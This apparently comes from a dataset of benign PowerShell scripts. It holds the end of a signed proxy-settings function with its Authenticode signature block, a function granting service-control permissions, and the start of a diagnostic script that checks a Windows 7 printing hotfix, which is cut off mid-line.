$Obj | Add-Member -MemberType noteproperty -Name SOCKSProxy -value $mps.SocksProxy $Obj | Add-Member -MemberType noteproperty -Name Client -value "" $Obj | Add-Member -MemberType noteproperty -Name Enabled -value $mps.Enabled $Results += $Obj } Write-Output $Results } } # SIG # Begin signature block # MIIo1wYJKoZIhvcNAQcCoIIoyDCCKMQCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCChA0UT4tceiQOs # NOtkbzPwEmU5xu0Fs50xQgRviyoVuKCCEe8wggWIMIIEcKADAgECAhAK3oEU12eb # Bm8tst/S9nrCMA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAkdCMRswGQYDVQQI # ExJHcmVhdGVyIE1hbmNoZXN0ZXIxEDAOBgNVBAcTB1NhbGZvcmQxGDAWBgNVBAoT # D1NlY3RpZ28gTGltaXRlZDEkMCIGA1UEAxMbU2VjdGlnbyBSU0EgQ29kZSBTaWdu # aW5nIENBMB4XDTIxMDQwNTAwMDAwMFoXDTIzMDQwNTIzNTk1OVowcDELMAkGA1UE # BhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFDASBgNVBAcMC1NhbnRhIENsYXJh # MRowGAYDVQQKDBFJbnRlbCBDb3Jwb3JhdGlvbjEaMBgGA1UEAwwRSW50ZWwgQ29y # cG9yYXRpb24wggGiMA0GCSqGSIb3DQEBAQUAA4IBjwAwggGKAoIBgQDjUVXd0eS2 # a1cJleh4bp6C5ngpid1fyZl3x1O7UH31slBxqjtjD45nsKBbDATVW/ZH0zqbLQ0P # pQLpLbBVHEFasianjtLSjFXs1pJJ14rfuZCyiOaFFCGYqb/fLQ2ZBq/0riDFgwfC # YS80SIV7V+hq+XJhpsUms/5QPqRilRnk+OPlbikQktkUVWi1qN7pkjkC5NgTDLnz # oxGP3OYA6x+ac3/NMQYnRXzbjACLUq70L2hDC8sDwaCQXavaUG29FF4MjwE8MzMx # DqcjpZmaO/jbTpExgMBfkDa+vqWSb99gdAeJI/JZXAeuYgGQ+66aIhwmRGsqQIXT # z4ofo+mRQMgSXatXEOtuBrC5q5GZUnWTTrdfnkdxg0oD9CsttmZg6Fhu5mTLYbJ+ # lKrV/JtSjKNgtQdYXCtnV5FRRzlqcjXqsXG+Q1YaY/n0lTEwCAqJyRMyJLuK/S/U # MUfPw9BvDQbpyB3ARSD4FJ3glwv9UDKd/BmQ2SVGpS+3/7whm633YIMCAwEAAaOC # AZAwggGMMB8GA1UdIwQYMBaAFA7hOqhTOjHVir7Bu61nGgOFrTQOMB0GA1UdDgQW # BBS5qxx6xBgtLKbRn3jrB6dtnHz6VDAOBgNVHQ8BAf8EBAMCB4AwDAYDVR0TAQH/ # BAIwADATBgNVHSUEDDAKBggrBgEFBQcDAzARBglghkgBhvhCAQEEBAMCBBAwSgYD # VR0gBEMwQTA1BgwrBgEEAbIxAQIBAwIwJTAjBggrBgEFBQcCARYXaHR0cHM6Ly9z # ZWN0aWdvLmNvbS9DUFMwCAYGZ4EMAQQBMEMGA1UdHwQ8MDowOKA2oDSGMmh0dHA6 # Ly9jcmwuc2VjdGlnby5jb20vU2VjdGlnb1JTQUNvZGVTaWduaW5nQ0EuY3JsMHMG # CCsGAQUFBwEBBGcwZTA+BggrBgEFBQcwAoYyaHR0cDovL2NydC5zZWN0aWdvLmNv # bS9TZWN0aWdvUlNBQ29kZVNpZ25pbmdDQS5jcnQwIwYIKwYBBQUHMAGGF2h0dHA6 # Ly9vY3NwLnNlY3RpZ28uY29tMA0GCSqGSIb3DQEBCwUAA4IBAQBAdvRj4EEZ88QF # gAGQZABeZB6XbzWNZaFrDGmZMTqREok2QqB6QxdyPSsAFEL5mVfwnD5f8F8iHx+W # aZXjKHbSvn1f1CAMFMc/i7Byrr984Obp2raebwFNRUO7l2lewLCgkRBlb3+W7Hud # eTGoTzhJL/Qcvy1jLT0VmhLJbvYjEpBuQ62z7MQH7HltsfjRnDu1RpqKsYWJuCt6 # tOSNn7MZ8vb5nsZEIqRoonucy4Yp1ItP/uXuLc4KcdLh+TzNUiXWWK6qQ6TqeeJp # Z34IjoS1FvjXLV4ACypUuUvmEIq691NseI4ByVHCZyMa59A6Scpp+kadDUEw0LZj # t9LGvtWIMIIF9TCCA92gAwIBAgIQHaJIMG+bJhjQguCWfTPTajANBgkqhkiG9w0B # AQwFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCk5ldyBKZXJzZXkxFDASBgNV # BAcTC0plcnNleSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRSVVNUIE5ldHdvcmsx # LjAsBgNVBAMTJVVTRVJUcnVzdCBSU0EgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkw # HhcNMTgxMTAyMDAwMDAwWhcNMzAxMjMxMjM1OTU5WjB8MQswCQYDVQQGEwJHQjEb # MBkGA1UECBMSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdTYWxmb3JkMRgw # FgYDVQQKEw9TZWN0aWdvIExpbWl0ZWQxJDAiBgNVBAMTG1NlY3RpZ28gUlNBIENv # ZGUgU2lnbmluZyBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAIYi # jTKFehifSfCWL2MIHi3cfJ8Uz+MmtiVmKUCGVEZ0MWLFEO2yhyemmcuVMMBW9aR1 # xqkOUGKlUZEQauBLYq798PgYrKf/7i4zIPoMGYmobHutAMNhodxpZW0fbieW15dR # hqb0J+V8aouVHltg1X7XFpKcAC9o95ftanK+ODtj3o+/bkxBXRIgCFnoOc2P0tbP # BrRXBbZOoT5Xax+YvMRi1hsLjcdmG0qfnYHEckC14l/vC0X/o84Xpi1VsLewvFRq # nbyNVlPG8Lp5UEks9wO5/i9lNfIi6iwHr0bZ+UYc3Ix8cSjz/qfGFN1VkW6KEQ3f # BiSVfQ+noXw62oY1YdMCAwEAAaOCAWQwggFgMB8GA1UdIwQYMBaAFFN5v1qqK0rP # VIDh2JvAnfKyA2bLMB0GA1UdDgQWBBQO4TqoUzox1Yq+wbutZxoDha00DjAOBgNV # HQ8BAf8EBAMCAYYwEgYDVR0TAQH/BAgwBgEB/wIBADAdBgNVHSUEFjAUBggrBgEF # BQcDAwYIKwYBBQUHAwgwEQYDVR0gBAowCDAGBgRVHSAAMFAGA1UdHwRJMEcwRaBD # oEGGP2h0dHA6Ly9jcmwudXNlcnRydXN0LmNvbS9VU0VSVHJ1c3RSU0FDZXJ0aWZp # Y2F0aW9uQXV0aG9yaXR5LmNybDB2BggrBgEFBQcBAQRqMGgwPwYIKwYBBQUHMAKG # M2h0dHA6Ly9jcnQudXNlcnRydXN0LmNvbS9VU0VSVHJ1c3RSU0FBZGRUcnVzdENB # LmNydDAlBggrBgEFBQcwAYYZaHR0cDovL29jc3AudXNlcnRydXN0LmNvbTANBgkq # hkiG9w0BAQwFAAOCAgEATWNQ7Uc0SmGk295qKoyb8QAAHh1iezrXMsL2s+Bjs/th # AIiaG20QBwRPvrjqiXgi6w9G7PNGXkBGiRL0C3danCpBOvzW9Ovn9xWVM8Ohgyi3 # 3i/klPeFM4MtSkBIv5rCT0qxjyT0s4E307dksKYjalloUkJf/wTr4XRleQj1qZPe # a3FAmZa6ePG5yOLDCBaxq2NayBWAbXReSnV+pbjDbLXP30p5h1zHQE1jNfYw08+1 # Cg4LBH+gS667o6XQhACTPlNdNKUANWlsvp8gJRANGftQkGG+OY96jk32nw4e/gdR # EmaDJhlIlc5KycF/8zoFm/lv34h/wCOe0h5DekUxwZxNqfBZslkZ6GqNKQQCd3xL # S81wvjqyVVp4Pry7bwMQJXcVNIr5NsxDkuS6T/FikyglVyn7URnHoSVAaoRXxrKd # sbwcCtp8Z359LukoTBh+xHsxQXGaSynsCz1XUNLK3f2eBVHlRHjdAd6xdZgNVCT9 # 8E7j4viDvXK6yz067vBeF5Jobchh+abxKgoLpbn0nu6YMgWFnuv5gynTxix9vTp3 # Los3QqBqgu07SqqUEKThDfgXxbZaeTMYkuO1dfih6Y4KJR7kHvGfWocj/5+kUZ77 # OYARzdu1xKeogG/lU9Tg46LC0lsa+jImLWpXcBw8pFguo/NbSwfcMlnzh6cabVgw # ggZmMIIETqADAgECAhMzAAAARLc//O9az6J6AAAAAABEMA0GCSqGSIb3DQEBBQUA # MH8xCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS # ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKTAnBgNVBAMT # IE1pY3Jvc29mdCBDb2RlIFZlcmlmaWNhdGlvbiBSb290MB4XDTE1MDcyMjIxMDM0 # OVoXDTI1MDcyMjIxMDM0OVowgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpOZXcg # SmVyc2V5MRQwEgYDVQQHEwtKZXJzZXkgQ2l0eTEeMBwGA1UEChMVVGhlIFVTRVJU # UlVTVCBOZXR3b3JrMS4wLAYDVQQDEyVVU0VSVHJ1c3QgUlNBIENlcnRpZmljYXRp # b24gQXV0aG9yaXR5MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAgBJl # FzYOw9sIs9CsVw127c0n00ytUINh4qogTQktZAnczomfzD2p7PbPwdzx07HWezco # EStH2jnGvDoZtF+mvX2do2NCtnbyqTsrkfjib9DsFiCQCT7i6HTJGLSR1GJk23+j # BvGIGGqQIjy8/hPwhxR79uQfjtTkUcYRZ0YIUcuGFFQ/vDP+fmyc/xadGL1RjjWm # p2bIcmfbIWax1Jt4A8BQOujM8Ny8nkz+rwWWNR9XWrf/zvk9tyy29lTdyOcSOk2u # TIq3XJq0tyA9yn8iNK5+O2hmAUTnAU5GU5szYPeUvlM3kHND8zLDU+/bqv50TmnH # a4xgk97Exwzf4TKuzJM7UXiVZ4vuPVb+DNBpDxsP8yUmazNt925H+nND5X4OpWax # KXwyhGNVicQNwZNUMBkTrNN9N6frXTpsNVzbQdcS2qlJC9/YgIoJk2KOtWbPJYjN # hLixP6Q5D9kCnusSTJV882sFqV4Wg8y4Z+LoE53MW4LTTLPtW//e5XOsIzstAL81 # VXQJSdhJWBp/kjbmUZIO8yZ9HE0XvMnsQybQv0FfQKlERPSZ51eHnlAfV1SoPv10 # Yy+xUGUJ5lhCLkMaTLTwJUdZ+gQek9QmRkpQgbLevni3/GcV4clXhB4PY9bpYrrW # X1Uu6lzGKAgEJTm4Diup8kyXHAc/DVL17e8vgg8CAwEAAaOB0DCBzTATBgNVHSUE # DDAKBggrBgEFBQcDAzASBgNVHRMBAf8ECDAGAQH/AgECMB0GA1UdDgQWBBRTeb9a # qitKz1SA4dibwJ3ysgNmyzALBgNVHQ8EBAMCAYYwHwYDVR0jBBgwFoAUYvsKIVt/ # Q24R2glUUGv10pZx8Z4wVQYDVR0fBE4wTDBKoEigRoZEaHR0cDovL2NybC5taWNy # b3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMvTWljcm9zb2Z0Q29kZVZlcmlmUm9v # dC5jcmwwDQYJKoZIhvcNAQEFBQADggIBAGsikzw9OVRxZGsO8uQ8MBHFIEpLhg+S # 8f8zeTrZ5JinDkCgIoB+YbLgpxnPJpUxKmXUak8xhurAxi7FZIw9SFnNCy90PZQm # ExBC1JeYJ148dtJ4aR0aZOcFcnXg62ZAQ5+PDEb/l2CmyGetEAibYqbpvjqK0wdN # n3KTJbwGEeAskDg+Zxz9GdeekM49wuDnYazA5QT1HplUDJENAVZxN64n1J5DIqXJ # J81N5XESOSSlQVaH/7xVFA8lyonux5fl0hP/PX4aoI8/yCzXo3DQx2DA/Ng+UeeX # xj477c94vorK48Typ6ftnq4IAo+gUttyHtU7w02fjvqbcMf4479sP5Kb5Dc+7GqM # KfnBor+LPhppZvscY08mAckCxD7S/8NDqBv9mfrUvKW54pMvOwHF0fQ6L2jD4GS3 # WpVeRswHg2m7PAWSVnM1c0WYTnzYEqW3QumiY/ZCYBhw0TtvMcCHx+Zx4fNGFun1 # uHKz6W0fYiZJo0mL3WjHi2hW9978+ockuAOBF4/l8WdqHa7TdPeMpV2zC45CKZbO # ScR3fmZ8ARcabBQkw7AXdwXYGkC3hmvY5HtArH7fTm8k+SCAgowz5+X6Kdid2otw # XSvJHYJMC2fLhEGe5wZ+EYNELYoZ7vR/mt15HDcZHp8/jCm6DVwQhjdsSM1FXc1w # vLzRTV3Yxbh2MYIWPjCCFjoCAQEwgZAwfDELMAkGA1UEBhMCR0IxGzAZBgNVBAgT # EkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UEBxMHU2FsZm9yZDEYMBYGA1UEChMP # U2VjdGlnbyBMaW1pdGVkMSQwIgYDVQQDExtTZWN0aWdvIFJTQSBDb2RlIFNpZ25p # bmcgQ0ECEAregRTXZ5sGby2y39L2esIwDQYJYIZIAWUDBAIBBQCgfDAQBgorBgEE # AYI3AgEMMQIwADAZBgkqhkiG9w0BCQMxDAYKKwYBBAGCNwIBBDAcBgorBgEEAYI3 # AgELMQ4wDAYKKwYBBAGCNwIBFTAvBgkqhkiG9w0BCQQxIgQgwSnwuE2YlK3mnj6h # sf8mu2ShSRf4cS9hCCo385mup/UwDQYJKoZIhvcNAQEBBQAEggGAqR9hxwPsp13n # 4pGES47AwvH+fNnJRw6GtglqEid17t0Ku4lmrL3QciP28TEnnq/rO8kEvk4sYQ5X # hVamGtYCbBypR0j4ZQmnbI8nL2VVZq9YEQFxajDYu3S1lOFFIkTUYr4Cd3Nbz0Eb # D07YXsQP9FfieXuTmlE+8b0+AOJ0kTHV6fPgIy8OoalETlkoB7KTt7fOI5PWmOqM # JMjZ5eX5+lCALb/bm9HASLRMf3uABHKkwUSoYZ+XY8yd6tHJI17hLZaWlMFqgFJw # cup8jqtuqs+ORInaMsR0ezqL3S4e3w1V9bHvouBGjvu54a2PUIS+xaFtGT1/L+KG # oauP2RFV+XDjy4ixpAhSjGxJGtu2iGy4E+N02EqCJAhNTIoNYs856o3/zP0BVvyz # 78nK32i7Vp8E4ZGHyAQi+4u3uOE37u2JUbCPMbjr7oRA53oUehepXLu1JoQ8VIzH # GzCRLo6PMqjpienLjI2X7CnGi+1w3zOSF+BvJeI7u6cmoY/rpWEvoYITgDCCE3wG # CisGAQQBgjcDAwExghNsMIITaAYJKoZIhvcNAQcCoIITWTCCE1UCAQMxDzANBglg # hkgBZQMEAgIFADCCAQ0GCyqGSIb3DQEJEAEEoIH9BIH6MIH3AgEBBgorBgEEAbIx # AgEBMDEwDQYJYIZIAWUDBAIBBQAEILsB9xbG55uAU2ygboWW6NmVWnuYShL9AdjI # I62nrczLAhUAgDzoVK43DpkEOtcsvOzUtfRqAioYDzIwMjExMDI3MTIxMTAwWqCB # iqSBhzCBhDELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3Rl # cjEQMA4GA1UEBxMHU2FsZm9yZDEYMBYGA1UEChMPU2VjdGlnbyBMaW1pdGVkMSww # KgYDVQQDDCNTZWN0aWdvIFJTQSBUaW1lIFN0YW1waW5nIFNpZ25lciAjMqCCDfsw # ggcHMIIE76ADAgECAhEAjHegAI/00bDGPZ86SIONazANBgkqhkiG9w0BAQwFADB9 # MQswCQYDVQQGEwJHQjEbMBkGA1UECBMSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYD # VQQHEwdTYWxmb3JkMRgwFgYDVQQKEw9TZWN0aWdvIExpbWl0ZWQxJTAjBgNVBAMT # HFNlY3RpZ28gUlNBIFRpbWUgU3RhbXBpbmcgQ0EwHhcNMjAxMDIzMDAwMDAwWhcN # MzIwMTIyMjM1OTU5WjCBhDELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIg # TWFuY2hlc3RlcjEQMA4GA1UEBxMHU2FsZm9yZDEYMBYGA1UEChMPU2VjdGlnbyBM # aW1pdGVkMSwwKgYDVQQDDCNTZWN0aWdvIFJTQSBUaW1lIFN0YW1waW5nIFNpZ25l # ciAjMjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJGHSyyLwfEeoJ7T # B8YBylKwvnl5XQlmBi0vNX27wPsn2kJqWRslTOrvQNaafjLIaoF9tFw+VhCBNToi # Noz7+CAph6x00BtivD9khwJf78WA7wYc3F5Ok4e4mt5MB06FzHDFDXvsw9njl+nL # GdtWRWzuSyBsyT5s/fCb8Sj4kZmq/FrBmoIgOrfv59a4JUnCORuHgTnLw7c6zZ9Q # BB8amaSAAk0dBahV021SgIPmbkilX8GJWGCK7/GszYdjGI50y4SHQWljgbz2H6p8 # 18FBzq2rdosggNQtlQeNx/ULFx6a5daZaVHHTqadKW/neZMNMmNTrszGKYogwWDG # 8gIsxPnIIt/5J4Khg1HCvMmCGiGEspe81K9EHJaCIpUqhVSu8f0+SXR0/I6uP6Vy # 9MNaAapQpYt2lRtm6+/a35Qu2RrrTCd9TAX3+CNdxFfIJgV6/IEjX1QJOCpi1arK # 3+3PU6sf9kSc1ZlZxVZkW/eOUg9m/Jg/RAYTZG7p4RVgUKWx7M+46MkLvsWE990K # ndq8KWw9Vu2/eGe2W8heFBy5r4Qtd6L3OZU3b05/HMY8BNYxxX7vPehRfnGtJHQb # LNz5fKrvwnZJaGLVi/UD3759jg82dUZbk3bEg+6CviyuNxLxvFbD5K1Dw7dmll6U # Mvqg9quJUPrOoPMIgRrRRKfM97gxAgMBAAGjggF4MIIBdDAfBgNVHSMEGDAWgBQa # ofhhGSAPw0F3RSiO0TVfBhIEVTAdBgNVHQ4EFgQUaXU3e7udNUJOv1fTmtufAdGu # 3tAwDgYDVR0PAQH/BAQDAgbAMAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYI # KwYBBQUHAwgwQAYDVR0gBDkwNzA1BgwrBgEEAbIxAQIBAwgwJTAjBggrBgEFBQcC # ARYXaHR0cHM6Ly9zZWN0aWdvLmNvbS9DUFMwRAYDVR0fBD0wOzA5oDegNYYzaHR0 # cDovL2NybC5zZWN0aWdvLmNvbS9TZWN0aWdvUlNBVGltZVN0YW1waW5nQ0EuY3Js # MHQGCCsGAQUFBwEBBGgwZjA/BggrBgEFBQcwAoYzaHR0cDovL2NydC5zZWN0aWdv # LmNvbS9TZWN0aWdvUlNBVGltZVN0YW1waW5nQ0EuY3J0MCMGCCsGAQUFBzABhhdo # dHRwOi8vb2NzcC5zZWN0aWdvLmNvbTANBgkqhkiG9w0BAQwFAAOCAgEASgN4kEIz # 7Hsagwk2M5hVu51ABjBrRWrxlA4ZUP9bJV474TnEW7rplZA3N73f+2Ts5YK3lcxX # VXBLTvSoh90ihaZXu7ghJ9SgKjGUigchnoq9pxr1AhXLRFCZjOw+ugN3poICkMIu # k6m+ITR1Y7ngLQ/PATfLjaL6uFqarqF6nhOTGVWPCZAu3+qIFxbradbhJb1FCJeA # 11QgKE/Ke7OzpdIAsGA0ZcTjxcOl5LqFqnpp23WkPnlomjaLQ6421GFyPA6FYg2g # XnDbZC8Bx8GhxySUo7I8brJeotD6qNG4JRwW5sDVf2gaxGUpNSotiLzqrnTWgufA # iLjhT3jwXMrAQFzCn9UyHCzaPKw29wZSmqNAMBewKRaZyaq3iEn36AslM7U/ba+f # XwpW3xKxw+7OkXfoIBPpXCTH6kQLSuYThBxN6w21uIagMKeLoZ+0LMzAFiPJkeVC # A0uAzuRN5ioBPsBehaAkoRdA1dvb55gQpPHqGRuAVPpHieiYgal1wA7f0GiUeaGg # no62t0Jmy9nZay9N2N4+Mh4g5OycTUKNncczmYI3RNQmKSZAjngvue76L/Hxj/5Q # uHjdFJbeHA5wsCqFarFsaOkq5BArbiH903ydN+QqBtbD8ddo408HeYEIE/6yZF7p # sTzm0Hgjsgks4iZivzupl1HMx0QygbKvz98wggbsMIIE1KADAgECAhAwD2+s3WaY # dHypRjaneC25MA0GCSqGSIb3DQEBDAUAMIGIMQswCQYDVQQGEwJVUzETMBEGA1UE # CBMKTmV3IEplcnNleTEUMBIGA1UEBxMLSmVyc2V5IENpdHkxHjAcBgNVBAoTFVRo # ZSBVU0VSVFJVU1QgTmV0d29yazEuMCwGA1UEAxMlVVNFUlRydXN0IFJTQSBDZXJ0 # aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0xOTA1MDIwMDAwMDBaFw0zODAxMTgyMzU5 # NTlaMH0xCzAJBgNVBAYTAkdCMRswGQYDVQQIExJHcmVhdGVyIE1hbmNoZXN0ZXIx # EDAOBgNVBAcTB1NhbGZvcmQxGDAWBgNVBAoTD1NlY3RpZ28gTGltaXRlZDElMCMG # A1UEAxMcU2VjdGlnbyBSU0EgVGltZSBTdGFtcGluZyBDQTCCAiIwDQYJKoZIhvcN # AQEBBQADggIPADCCAgoCggIBAMgbAa/ZLH6ImX0BmD8gkL2cgCFUk7nPoD5T77Na # wHbWGgSlzkeDtevEzEk0y/NFZbn5p2QWJgn71TJSeS7JY8ITm7aGPwEFkmZvIavV # cRB5h/RGKs3EWsnb111JTXJWD9zJ41OYOioe/M5YSdO/8zm7uaQjQqzQFcN/nqJc # 1zjxFrJw06PE37PFcqwuCnf8DZRSt/wflXMkPQEovA8NT7ORAY5unSd1VdEXOzQh # e5cBlK9/gM/REQpXhMl/VuC9RpyCvpSdv7QgsGB+uE31DT/b0OqFjIpWcdEtlEzI # jDzTFKKcvSb/01Mgx2Bpm1gKVPQF5/0xrPnIhRfHuCkZpCkvRuPd25Ffnz82Pg4w # ZytGtzWvlr7aTGDMqLufDRTUGMQwmHSCIc9iVrUhcxIe/arKCFiHd6QV6xlV/9A5 # VC0m7kUaOm/N14Tw1/AoxU9kgwLU++Le8bwCKPRt2ieKBtKWh97oaw7wW33pdmmT # IBxKlyx3GSuTlZicl57rjsF4VsZEJd8GEpoGLZ8DXv2DolNnyrH6jaFkyYiSWcuo # RsDJ8qb/fVfbEnb6ikEk1Bv8cqUUotStQxykSYtBORQDHin6G6UirqXDTYLQjdpr # t9v3GEBXc/Bxo/tKfUU2wfeNgvq5yQ1TgH36tjlYMu9vGFCJ10+dM70atZ2h3pVB # eqeDAgMBAAGjggFaMIIBVjAfBgNVHSMEGDAWgBRTeb9aqitKz1SA4dibwJ3ysgNm # yzAdBgNVHQ4EFgQUGqH4YRkgD8NBd0UojtE1XwYSBFUwDgYDVR0PAQH/BAQDAgGG # MBIGA1UdEwEB/wQIMAYBAf8CAQAwEwYDVR0lBAwwCgYIKwYBBQUHAwgwEQYDVR0g # BAowCDAGBgRVHSAAMFAGA1UdHwRJMEcwRaBDoEGGP2h0dHA6Ly9jcmwudXNlcnRy # dXN0LmNvbS9VU0VSVHJ1c3RSU0FDZXJ0aWZpY2F0aW9uQXV0aG9yaXR5LmNybDB2 # BggrBgEFBQcBAQRqMGgwPwYIKwYBBQUHMAKGM2h0dHA6Ly9jcnQudXNlcnRydXN0 # LmNvbS9VU0VSVHJ1c3RSU0FBZGRUcnVzdENBLmNydDAlBggrBgEFBQcwAYYZaHR0 # cDovL29jc3AudXNlcnRydXN0LmNvbTANBgkqhkiG9w0BAQwFAAOCAgEAbVSBpTNd # FuG1U4GRdd8DejILLSWEEbKw2yp9KgX1vDsn9FqguUlZkClsYcu1UNviffmfAO9A # w63T4uRW+VhBz/FC5RB9/7B0H4/GXAn5M17qoBwmWFzztBEP1dXD4rzVWHi/SHbh # RGdtj7BDEA+N5Pk4Yr8TAcWFo0zFzLJTMJWk1vSWVgi4zVx/AZa+clJqO0I3fBZ4 # OZOTlJux3LJtQW1nzclvkD1/RXLBGyPWwlWEZuSzxWYG9vPWS16toytCiiGS/qhv # WiVwYoFzY16gu9jc10rTPa+DBjgSHSSHLeT8AtY+dwS8BDa153fLnC6NIxi5o8JH # HfBd1qFzVwVomqfJN2Udvuq82EKDQwWli6YJ/9GhlKZOqj0J9QVst9JkWtgqIsJL # nfE5XkzeSD2bNJaaCV+O/fexUpHOP4n2HKG1qXUfcb9bQ11lPVCBbqvw0NP8srMf # tpmWJvQ8eYtcZMzN7iea5aDADHKHwW5NWtMe6vBE5jJvHOsXTpTDeGUgOw9Bqh/p # oUGd/rG4oGUqNODeqPk85sEwu8CgYyz8XBYAqNDEf+oRnR4GxqZtMl20OAkrSQeq # /eww2vGnL8+3/frQo4TZJ577AWZ3uVYQ4SBuxq6x+ba6yDVdM3aO8XwgDCp3rrWi # Aoa6Ke60WgCxjKvj+QrJVF3UuWp0nr1IrpgxggQtMIIEKQIBATCBkjB9MQswCQYD # VQQGEwJHQjEbMBkGA1UECBMSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdT # YWxmb3JkMRgwFgYDVQQKEw9TZWN0aWdvIExpbWl0ZWQxJTAjBgNVBAMTHFNlY3Rp # Z28gUlNBIFRpbWUgU3RhbXBpbmcgQ0ECEQCMd6AAj/TRsMY9nzpIg41rMA0GCWCG # SAFlAwQCAgUAoIIBazAaBgkqhkiG9w0BCQMxDQYLKoZIhvcNAQkQAQQwHAYJKoZI # hvcNAQkFMQ8XDTIxMTAyNzEyMTEwMFowPwYJKoZIhvcNAQkEMTIEMOEumTnUv7bB # DYaV3j0+Nt2Qcuv+PQ++CUlUm7sMQumeTPTXOag/6Mylof+I14twdjCB7QYLKoZI # hvcNAQkQAgwxgd0wgdowgdcwFgQUlRE3EB2ILzG9UT+UmtpMaK2MCPUwgbwEFALW # W5Xig3DBVwCV+oj5I92Tf62PMIGjMIGOpIGLMIGIMQswCQYDVQQGEwJVUzETMBEG # A1UECBMKTmV3IEplcnNleTEUMBIGA1UEBxMLSmVyc2V5IENpdHkxHjAcBgNVBAoT # FVRoZSBVU0VSVFJVU1QgTmV0d29yazEuMCwGA1UEAxMlVVNFUlRydXN0IFJTQSBD # ZXJ0aWZpY2F0aW9uIEF1dGhvcml0eQIQMA9vrN1mmHR8qUY2p3gtuTANBgkqhkiG # 9w0BAQEFAASCAgBJmajClqOjvWVfyE0y6G5g6FRw7sU8Wsa3/RJj9Wh0nKtpu2uq # OizzZZCVXj+C3i2vwQYorL6BFvPUqneOKABwkwAcJUkQKHMhIXnPY8fIItb8FdtY # bgqWCyRUDsi7Bmlla76lpibikwdA6GYHb5LS5TrmeczV91TGjPbzDBsEM7X2J41U # QoY3pB7WTyHRFdbrUFIypKU78aoeRJTXIO4zGe+cdKLb+01+KFrbmRwzWGkhy+/h # 4C1OCe6o/3Be883ZBgq7wqpipHb4utv++GvfJN9kYQxPfX3Tvkcbk7KGhmHMSQal # j2mkr9INlV6Onf/nSzWf7TI5xQ2axP7m9LFXc5RTdYQpSG74BEpP/5ljJGV3DKAY # v+A7ExO6ioDCauEeJ7vLvHNltRBLKjw39OHX6SIhe9H0Vq4T/EYzRWFsRt73BzgB # 43RjSCqxfMfUJJYx07xQi33m4qmL82b34i1vN1K74zxh7iaM7mNZ/Z+6n8tokKi6 # oa94iyAf+V5p6Gy2uu/lnz51DiBrf/Kovk+nq8zUlIx6GHKBIMPuAfbdZenOYn7i # a/+IHi1pDtEqty243eb4Xdr7FoBdHCDcB6HZkvPZBoXjjuUSsqGBPwx/OiKJ7ZSu # k3+jHx5fQLc6ohKdlDPtb1Cr5AOseIfmp2k/SKKPuyYuzif5DuzzkDeNcw== # SIG # End signature block
combined_dataset/train/non-malicious/1455.ps1
1455.ps1
function Grant-CServiceControlPermission { [CmdletBinding(SupportsShouldProcess=$true)] param( [Parameter(Mandatory=$true)] [string] $ServiceName, [Parameter(Mandatory=$true)] [string] $Identity ) Set-StrictMode -Version 'Latest' Use-CallerPreference -Cmdlet $PSCmdlet -Session $ExecutionContext.SessionState if( $pscmdlet.ShouldProcess( $ServiceName, "grant control service permissions to '$Identity'" ) ) { Grant-CServicePermission -Name $ServiceName -Identity $Identity -QueryStatus -EnumerateDependents -Start -Stop } }
combined_dataset/train/non-malicious/sample_4_13.ps1
sample_4_13.ps1
#************************************************ # TS_Win7PrintUpdateRollupCheck.ps1 # Version 1.0.1 # Date: 6/8/2012 # Author: v-alyao # Description: [Idea ID 4168] [Windows] Check for existence of 2647753 for printing issues # Rule number: 4168 # Rule URL: http://sharepoint/sites/rules/Rule Submissions/Forms/DispForm.aspx?ID=4168 #************************************************ Import-LocalizedData -BindingVariable ScriptStrings Display-DefaultActivity -Rule -RuleNumber 4168 $RuleApplicable = $false $RootCauseDetected = $false $RootCauseName = "RC_Win7PrintUpdateRollupCheck" $PublicContent = "http://support.microsoft.com/kb/2647753" $InternalContent = "" $Verbosity = "Warning" $Visibility = "4" $SupportTopicsID = "8066" $Title = $ScriptStrings.ID_Win7PrintUpdateRollupCheck_ST $InformationCollected = new-object PSObject # *************************** # Data Gathering # *************************** Function AppliesToSystem { #Add your logic here to specify on which environments this rule will appy return(($OSVersion.Build -eq 7600) -or ($OSVersion.Build -eq 7601))#Win 7/Server 2008 R2 } #Check the Localspl.dll is installed or not. Function CheckHotfixInstalled() { $file="$Env:Windir\system32\localspl.dll" if(Test-Path -Path $file) { $fileVersionInfo = [System.Diagnostics.FileVersionInfo]::GetVersionInfo($file) if(($OSVersion.Build -eq 7600) -and ($fileVersionInfo.FilePrivatePart.ToString().StartsWith("16"))) { $filePrivatePartVersion=16962 $requiredVersion='6.1.7600.16962' } elseif(($OSVersion.Build -eq 7600) -and ($fileVersionInfo.FilePrivatePart.ToString().StartsWith("21"))) { $filePrivatePartVersion=21149 $requiredVersion='6.1.7600.21149' } elseif(($OSVersion.Build -eq 7601) -and ($fileVersionInfo.FilePrivatePart.ToString().StartsWith("17"))) { $filePrivatePartVersion=17777 $requiredVersion='6.1.7601.17777' } elseif(($OSVersion.Build -eq 